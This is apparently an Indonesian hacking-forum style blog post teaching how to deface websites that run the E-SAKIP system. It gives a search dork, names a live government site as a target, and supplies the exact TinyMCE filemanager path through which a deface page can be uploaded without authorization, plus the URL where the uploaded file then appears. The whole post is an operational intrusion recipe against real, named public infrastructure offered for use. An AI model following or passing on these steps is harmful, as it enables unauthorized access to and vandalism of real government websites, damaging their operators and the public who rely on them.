Hallo Exploiter Kali Ini Saya Akan Share Tutorial Deface Poc E-SAKIP File Manager File Upload,Langsung Saja Ke Tutorial Nya.
Bahan":
-Dork: inurl:/portal/home/kontak_view
-kopi
-Sc Deface
Langsung saja ke tutor
pertama lu ngedork dulu dgn memakai dork yg w kasih klo lu males ngedork nih live target
https://e-sakip.bontangkota.go.id/portal/home
Setelah itu tambahkan exploitnya di belakang domain target lu
Exploitnya: plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php
Contoh:
https://e-sakip.bontangkota.go.id/plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php
Kalo vuln nanti jadi gini
Setelah itu klik tombol upload di pojok atas,nanti tampilannya kek gini,terus klik "drop files" terus pilih SC deface lu.
Kalau terupload ada tanda ✓
Nah tinggal kita akses.. caranya???targetlu.go.id/upload/nama SC deface mu
Contoh:
https://e-sakip.bontangkota.go.id/uploads/Tytyd.html
Tambahkan Komentar